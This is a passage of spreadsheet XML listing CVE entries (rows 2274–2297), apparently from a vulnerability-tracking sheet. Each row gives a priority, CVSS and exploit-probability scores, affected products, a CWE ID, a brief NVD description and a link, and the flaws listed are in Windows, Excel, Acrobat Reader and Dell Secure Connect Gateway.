      <c r="H2274" s="5" t="inlineStr"/>
      <c r="I2274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2274" s="5" t="inlineStr"/>
      <c r="K2274" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2274" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="C2275" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2275" s="5" t="inlineStr"/>
      <c r="F2275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2275" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2275" s="5" t="inlineStr"/>
      <c r="I2275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2275" s="5" t="inlineStr"/>
      <c r="K2275" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L2275" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="C2276" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2276" s="5" t="inlineStr"/>
      <c r="F2276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2276" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H227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276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2276" s="5" t="inlineStr"/>
      <c r="K2276" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2276" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="C2277" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2277" s="5" t="inlineStr"/>
      <c r="F2277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2277" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2277" s="5" t="inlineStr"/>
      <c r="I2277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2277" s="5" t="inlineStr"/>
      <c r="K2277" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2277" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78136</t>
        </is>
      </c>
      <c r="C2278" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2278" s="5" t="inlineStr"/>
      <c r="F2278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2278" s="5" t="inlineStr"/>
      <c r="H2278" s="5" t="inlineStr"/>
      <c r="I2278" s="5" t="inlineStr">
        <is>
          <t>2026-08-23</t>
        </is>
      </c>
      <c r="J2278" s="5" t="inlineStr"/>
      <c r="K2278" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2278" s="5" t="inlineStr">
        <is>
          <t>chirpmyradio CHIRP before 39178db allows eval injection via crafted CSV data. This occurs in _clean_tmode in drivers/kenwood_itm.py.</t>
        </is>
      </c>
      <c r="M2278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78136</t>
        </is>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="C2279" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2279" s="5" t="inlineStr"/>
      <c r="F2279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2279" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H227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79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2279" s="5" t="inlineStr"/>
      <c r="K2279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2279" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="C2280" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2280" s="5" t="inlineStr"/>
      <c r="F2280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2280" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H228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80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2280" s="5" t="inlineStr"/>
      <c r="K2280" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2280" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78482</t>
        </is>
      </c>
      <c r="C2281" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2281" s="5" t="inlineStr"/>
      <c r="F2281" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G2281" s="5" t="inlineStr"/>
      <c r="H2281" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2281" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2281" s="5" t="inlineStr"/>
      <c r="K2281" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2281"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M2281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78482</t>
        </is>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="C2282" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2282" s="5" t="inlineStr"/>
      <c r="F2282" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G2282" s="5" t="inlineStr"/>
      <c r="H2282" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2282" s="5" t="inlineStr"/>
      <c r="K2282" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2282"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M2282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="C2283" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2283" s="5" t="inlineStr"/>
      <c r="F2283" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G2283" s="5" t="inlineStr"/>
      <c r="H2283" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2283" s="5" t="inlineStr"/>
      <c r="K2283" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2283"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M2283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="C2284" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2284" s="5" t="inlineStr"/>
      <c r="F2284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2284" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2284" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2284" s="5" t="inlineStr"/>
      <c r="K2284" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2284" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="C2285" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2285" s="5" t="inlineStr"/>
      <c r="F2285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2285" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2285" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2285" s="5" t="inlineStr"/>
      <c r="K2285" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2285" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="C2286" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2286" s="5" t="inlineStr"/>
      <c r="F2286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2286" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2286" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2286" s="5" t="inlineStr"/>
      <c r="K2286" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2286" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="C2287" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2287" s="5" t="inlineStr"/>
      <c r="F2287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2287" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2287" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I2287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2287" s="5" t="inlineStr"/>
      <c r="K2287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2287" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="C2288" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2288" s="5" t="inlineStr"/>
      <c r="F2288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2288" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2288" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2288" s="5" t="inlineStr"/>
      <c r="K2288" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2288" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80166</t>
        </is>
      </c>
      <c r="C2289" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2289" s="5" t="inlineStr"/>
      <c r="F2289" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2289" s="5" t="inlineStr"/>
      <c r="H2289" s="5" t="inlineStr"/>
      <c r="I2289" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2289" s="5" t="inlineStr"/>
      <c r="K2289" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2289" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M2289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80166</t>
        </is>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="C2290" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2290" s="5" t="inlineStr"/>
      <c r="F2290" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2290" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2290" s="5" t="inlineStr"/>
      <c r="I2290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2290" s="5" t="inlineStr"/>
      <c r="K2290" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2290" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="C2291" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2291" s="5" t="inlineStr"/>
      <c r="F2291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2291" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2291" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2291" s="5" t="inlineStr"/>
      <c r="K2291" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2291" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="C2292" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2292" s="5" t="inlineStr"/>
      <c r="F2292" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2292" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2292" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2292" s="5" t="inlineStr"/>
      <c r="K2292" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2292" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="C2293" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2293" s="5" t="inlineStr"/>
      <c r="F2293" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2293" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2293" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2293" s="5" t="inlineStr"/>
      <c r="K2293" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="L2293" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="C2294" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2294" s="5" t="inlineStr"/>
      <c r="F2294" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2294" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2294" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2294" s="5" t="inlineStr"/>
      <c r="K2294" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2294" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="C2295" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2295" s="5" t="inlineStr"/>
      <c r="F2295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2295" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2295" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2295" s="5" t="inlineStr"/>
      <c r="K2295" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="C2296" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2296" s="5" t="inlineStr"/>
      <c r="F2296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2296" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2296" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I2296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2296" s="5" t="inlineStr"/>
      <c r="K2296" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2296" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="C2297" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2297" s="5" t="inlineStr"/>
